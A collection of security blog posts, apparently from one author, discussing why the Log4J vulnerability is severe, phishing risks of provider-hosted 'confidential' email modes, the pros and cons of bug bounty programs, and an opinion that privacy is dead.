Three Reasons Why Log4J Is So Bad: Ubiquity, Severity and Exploitability

Over the last few weeks, security teams everywhere have been busy patching Log4J vulnerabilities. In this article we want to talk about the three things you can tell your friends why this is way worse.

Ubiquity

This vulnerability impacts impacts Java applications and those can be found almost anywhere: enterprise, vendor applications, database drivers, Android phones and even the smartchip on the credit card in your wallet (Java Card). Additionally, majority of Java applications use log4j to handle logging, often involving user input. While your phone is probably not exploitable, the sheer number of places where log4j can be hiding makes this is hard to fix.

Severity

There are vulnerabilities that come out all the time, but few of them reach the highest possible level of severity: remote code execution (RCE) and this one hits that ticket. That means that every server running Java within your company becomes everyone’s computer – an attacker can run anything they want there and then use that as a springboard to tunnel in further.

Exploitability

There are many severe vulnerabilities out there that require specialized knowledge to exploit including speaking dead computer languages and building weird binaries during a full moon. With this one, you can begin the exploit by copy/pasting a tweet into a search bar combined with DNS.

Hazards of Encrypted/Confidential Mode for Email

Recently Office 365 and Gmail introduced encrypted or confidential mode for email. This is not true encryption like PGP or S/MIME where two parties exchange keys and then proceed to send and receive email. Rather, the entire experience remains hosted at the originating email provider, and the receiver can access the “secured” message via a web link, which can be opened using a one time code, an SMS code or a login. In the same vain, they can reply via the same mechanism to the sender – with the entire experience hosted by Office 365 or Gmail.

Some concerns with this approach:

  • Since all entire visual experience remains the same for most messages, it would be trivial for attackers to send phishing emails that looks identical to the real messages. With true encryption, this wouldn’t be an issue since the receiver would be able to verify the identity of the sender via keys exchanged prior to the email.
  • Since the links to read the message go to the same domain (“confidential-mail.google.com“), it would be trivial for an attacker to register a look-alike domain (for example “confidentialmailgoogle.com” and “confidential-mail-google.com” are both unregistered). Again, not an issue with true encryption where the message is not hosted by the sender.
  • If combined with a password-protected file, it would be possible for phishers and malware producers to host and spread their content via these types of messages without having the receiver being able to scan these files. With true encryption, there is a key exchange that takes place before.
  • Since the real message content never travels through the email infrastructure, any existing controls that are in place to check and scan email will no longer apply. Organizations need to apply such controls on the web layer instead if the

Here is what it looks like by the receiver on Gmail (Office 365 screenshots coming):

Screen Shot 2019-07-28 at 7.28.18 PMScreen Shot 2019-07-28 at 7.30.05 PM

 

Opinion: Security Bounty Hunting for Fun and Profit

Introduction

Many technology companies are beginning to embrace the concept of bounties to enhance the security of their products, websites and apps. Bounty programs promise a reward to those reporting security issues and are just one of the ways vendors and researchers can interact. These rewards range from honourable mentions, to free swag like shirts, airline miles and even hard cold cash. The type of award and amounts range from company to company, and are usually tied to the severity of the vulnerability.

Part of the bounty process is usually a requirement to adhere to the principle of responsible disclosure — a promise not to publish or disclose the details of the security issue found until the company had the opportunity to fix it. This allows the company to fix the problem with sufficient testing time as opposed to the case where something is already public and there is both public and internal pressure to rush out a fix as fast as possible. In some extreme cases, companies may “gag” researchers by forbidding disclosure all together even after the bug is fixed. Because computer security is an ever evolving field and researchers often learn from previously discovered security bugs, hiding those details is generally not conducive.

Why would a vendor pay bounties?

Security issues have an outsize impact because of the damage they can cause. A broken word processor that eats your resume for lunch affects subset of users. An insecure word processor automatically lets malware in, affects a lot more people. And a broken word processor that is hosted on a server instead of your laptop, can be used as a gateway to burrow into a company and attack other systems inside it.

Because a security bug affects other things on your computer and possibly other devices, it is way more dangerous that a regular one. Additionally, security bugs are highly attractive to attackers because of a larger possible payback for an attack. Another interesting thing that has been happening in the technology world recently is that an underground black market has developed specifically focused on finding, trading, selling and buying security vulnerabilities. The most severe of these are known as “zero days” and impact commonly used software like web browsers. Those often command six and sometimes seven digit payouts. The actors on these black markets often include governments and intelligence agencies.

Bounty programs that are run by vendors are positioned as a safer alternative to the black market with bounty payouts often as high as what the open market commands without the risk or hassle of dealing with the underground economy.

How does the bounty process work?

The bounty process is pretty straightforward most of the time. Usually a company publishes guidelines of how their bounty process works. This includes details as to which systems or products are in scope, what kind of bugs are covered and what kind of testing is allowed or not allowed. Often automated testing is a big no-no, because companies do not want their production systems to go down. There will usually be a way to contact the company, often with the use of email encryption such as PGP. Some companies choose to use third party vendors to administer their bounty programs such as HackerOne and BugCrowd. These third party vendors will take a cut of the bounty payout or get paid by the vendors directly.

A researcher would send data to the vendor via encrypted email or some other method preferred by the vendor. The vendor would acknowledge the receipt and then triage the reports. Often reports may be rejected for a bounty payout because they cannot be replicated, they are out of scope for the program, do not affect a system described in the bounty, or are not severe enough.

Once accepted, the vendor will usually begin an investigation. During this process, which sometimes can last weeks or months, usually there is no more communications between the vendor and the reporter, other than follow up questions, until the vulnerability is confirmed and fixed. Once the bug is fixed and published, the bounty is paid out and the researcher is usually free to publish the details.

The dark side of bounties

While security bounties in theory, enhance the overall security of technology products and services, there are several dark sides to this process as well. First of all, vendors can use the bounty process as a way to influence security research in ways they want. One example of that maybe the use of the “gag” as described above. Another way may be to drag out the evaluation and fixing the potential bug as long as possible in hopes of reducing the amount of bad publicity for the vendor. A more sinister way is the use of legal process including lawsuits, injunctions or in extreme cases even criminal complaints.

Because of the possibly delaying tactics employed by some vendors, there are vulnerability researchers, most notably Google’s ProjectZero, give vendors a hard deadline after which they will publicly disclose the vulnerability (and lose the bounty). This remains a controversial tactic within the community and it remains to be seen whether it is effective.

For the company operating bounty programs there is an increased risk of their systems being breached and going under due to the increased amount of testing, especially brute force and highly automated testing, even if forbidden by the bounty. However, often the advantage of knowing about a security issue and having ability to fix it early will outweigh the potential impact of possible testing.

A more extreme case is sometimes seen where the discover of the security issue blackmail the company outside of any formal bounty program, with the bounty program seen as a sign of the willingness of the vendor to pay up.

Last, there is also an overall commoditization of security research, much alike the various on-demand services that exist today for other things like cars, food, etc. Instead of hiring internal security testers or expensive third parties, bounty programs offer a way for companies to “Uberrize” the security research process by allowing many people to take part of it, but at a lower payout to each. Essentially, they are paying for on-demand security testing but much less than a full-time salary or consultant’s fee would be.

The Future of Bounties

While the proponents of security bounties argue powerfully for their benefits and their opponents argue against them, the jury is still out there of what effect of offering cash rewards has on security research. As more companies experiment with security bounties, it would become more clear whether they are beneficial or detrimental to those companies, their users, the security research community and the Internet as whole.

Opinion: Privacy is Dead: It’s Time We Admit It

“And even inside your mind, do not curse the king, and in your inner bedroom do not curse the rich, for a bird may relay your voice, and a flying thing may retell the matter.” (Ecclesiastes 10:20)

Hacking is all the rage these days — it seems that every week another organization is getting breached and their users’ data is splashed across the Internet. Small businesses, big government agencies, mundane emails, and national security files, are all fair game. After all, the logic goes — they should have known better: they should have secured their files, did better background checks on their employees and contractors, applied encryption, and in some cases simply locked the doors and alarmed the windows. And now, that the cow has left the barn, and the breaches happened, we respond in a typical American fashion — we fine them, we sue them and sometimes we fire them.

However, this simplistic view misses the essential truth of today’s hyper-connected world — our privacy is dead. As a matter of fact, it has died long ago, and we are simply not able to face the truth. In the world where almost everyone is carrying a cell phone that is capable to recording and transmitting video and audio, privacy does not exist. In a country that records the phone calls, and electronic activity of its citizenry in a quixotic quest for national (in)security, privacy cannot exist. In a state that reads the license plates of its taxpayers’ cars as they travel in public, privacy will not exist. And on the Internet, where everything is connected to everything else, privacy never existed.

We are surrounded by an ever increasing number of machines that constantly record everything we do. Ranging from cell phones, personal computers, Internet-connected appliances, to license plate readers on police cars, cameras at intersections, drones and satellites, our every single step is theoretically seen, heard, and possibly recorded by some machine, somewhere. Every time we interact with governments, businesses, or even each other, those interaction generate digital files and tracks. As more and more devices become intelligent, and connected to the Internet, that tidal wave of personal data collection will become a deluge. Within a few years if not already, it is probably safe to say that it would be possible to reconstruct most of our daily activities from our digital footprints on the sand shores of the Internet of things.

The “Inter-net” by its very name and nature, was designed to connect machines, networks, and human beings together in a seamless fashion. Why is it then that we are surprised when our information including medical records, tax returns and polygraphs can easily be pilfered by digital bandits from so-called “secure” places? That is the nature of the beast that we created — everything is connected to everything, and it is getting harder and harder to keep the bad guys out. The hacks and data breaches which are getting more common, and bigger in size and scope, are canaries in the digital coalmines. The only thing that is holding back the deluge is the fact that there aren’t enough trained people available to break in, take and interpret this data. However, as artificial intelligence is constantly being improved, it would only be a matter of time until machines can steal and analyze better than humans.

It is time that we woke up from our dream world, and admitted to ourselves that privacy does not exist. We should be aware that we are constantly being watched by thousands of eyes, and being heard by thousands of ears, and not always knowing of who the watchers really are. We need to start pushing back at both businesses and governments, letting them know that we value our personal privacy and do not appreciate our information, whether mundane or intimate, being collected and shared. We should also start re-evaluating how much personal information we ourselves share with others on a daily basis, and whether all of it is really necessary. And we need to start unplugging ourselves more often and enjoying the company of other humans instead of machines.